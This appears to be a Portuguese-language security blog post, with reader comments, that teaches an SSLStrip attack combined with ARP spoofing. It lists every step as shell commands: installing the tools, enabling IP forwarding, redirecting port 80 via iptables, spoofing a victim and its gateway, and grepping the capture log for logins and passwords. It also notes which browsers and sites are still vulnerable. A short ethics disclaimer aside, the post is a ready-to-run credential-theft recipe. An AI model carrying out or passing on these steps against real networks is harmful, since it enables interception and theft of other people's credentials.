ArtigosOffensive

Entendendo e Atacando Com SSLStrip

Galera hoje iremos conhecer um pouco sobre o SSLStrip, iremos descobrir como conseguir snifar e ter acesso a dados criptografados na rede, muita gente pensa que ao utilizar o protocolo HTTPS nos sites estão 100% livres de roubo de informações, mas não é bem assim, a confiabilidade não depende somente do HTTPS, existem outros fatores envolvidos, se a vítima estiver suscetível a arp spoof nós conseguimos utilizar o SSLStrip e ter acesso “fácil” ao dados.

O SSLStrip nos permite isso, essa técnica é relativamente fácil de se aplicar e extremamente poderosa, ela funciona juntamente com o arpspoof que já vimos como funciona, para aqueles que não viram basta acessar Entendendo e Realizando Um Ataque Arp Spoof .

Quando um usuário se conecta em um site seguro ele transfere as informações criptografadas com o servidor impedindo um ataque de sniffing tradicional, quando realizamos o ataque de sslstrip primeiramente interceptamos o trafego do alvo através de técnicas man-in-the-middle, assim o atacante engana o alvo fazendo se passar por um Proxy e engana o servidor se passando pelo cliente, assim as informações são passadas para o atacante em texto puro, abaixo irei demonstrar como funciona o ataque propriamente dito, estou utilizando o Ubuntu Server 14.04 para instalar o sslstrip e um Windows como alvo. Todas as informações aqui contidas são para fins didáticos e não para causar danos e prejuízos para alguém, usem esse conhecimento com ética e responsabilidade.

Vamos para instalação, primeiramente iremos baixar o SSLStrip:

# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

Depois de baixar iremos descompactar e acessar o diretório:

# tar -xvzf sslstrip-0.9.tar.gz && cd sslstrip-0.9

Agora é hora de instalar o SSLStrip

# python setup.py build
# python setup.py install

Pronto, seu SSLStrip já esta instalado, agora iremos instalar outros pacotes que ele precisa para funcionar corretamente.

# apt-get install dsniff python-twisted-web

Pronto, agora iremos começar o nosso ataque propriamente dito, primeiramente iremos habilitar o encaminhamento de pacotes para realizar o arp spoof:

# echo “1” > /proc/sys/net/ipv4/ip_forward

Depois redirecione o trafego da porta 80 para a porta que utilizaremos no sslstrip, no caso redirecionei para a porta 8080:

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Agora vamos mandar o sslstrip escutar o trafego na porta 8080 e mandar ele logar tudo:

# sslstrip -a -l 8080

Depois disso em outro terminal começe o arp spoof entre a vitima e o gateway:

# arpspoof -i eth0 -t 192.168.0.55 192.168.0.1

Em outro terminal:

# arpspoof -i eth0 -t 192.168.0.1 192.168.0.55

Você pode acompanhar o trafego em outro terminal dando:

# tail -f sslstrip.log

Obs: O arquivo de log é criado no mesmo diretório onde foi executado o comando sslstrip.

Para ver as senhas procure por login ou passwd dentro do arquivo de log, não se assuste com a quantidade de informações dentro do arquivo é assim mesmo.

Obs: Se você estiver tentando capturar senhas do Gmail e a vitima estiver utilizando o Google Chrome não vai funcionar, tem que ser outro navegador como o IE por exemplo, mas o resto funciona como: facebook, terra, entre outros.

Bem pessoal é isso ai, espero que tenham gostado do post e que usem esse conhecimento com cautela, até a próxima.

Ricardo Galossi
Siga me
Últimos posts por Ricardo Galossi (exibir todos)

Ricardo Galossi

É um apaixonado por segurança da informação, atua profissionalmente há mais de 7 anos na área de tecnologia da informação, onde é focado em análise de vulnerabilidades e testes de invasão. Criou o blog Guia do TI para compartilhar conhecimento, ajudar os mais novos, incentivar debates e manter a comunidade atualizada com as principais notícias da área de TI.

7 thoughts on “Entendendo e Atacando Com SSLStrip

  • Ewerton Silva

    Saudações!

    Sempre que uso o sslstrip, o host da vítima não navega, se a vítima não navega, não terá o que capturar. Isso é normal?

    Resposta
    • qwertyyy

      Você fez # echo “1” > /proc/sys/net/ipv4/ip_forward?

      Resposta
  • Ewerton Silva

    Log do sslstrip em branco.

    Resposta
  • Renato Fernandes Pereira

    o arquivo de sslstip.log esta em branco alguem pode me ajudar ?

    Resposta
  • Matheus Oliveira Froyd

    Muito bom , funcionou perfeitamente , ótimo ataque MTIM

    Resposta
  • Alexandre Angeli

    Boa tarde,
    Eu não estou conseguindo entender..

    Se o objetivo é capturar o acesso HTTPS (443), o que adianta eu redirecionar o tráfego da porta 80?

    Resposta

Deixe seu comentário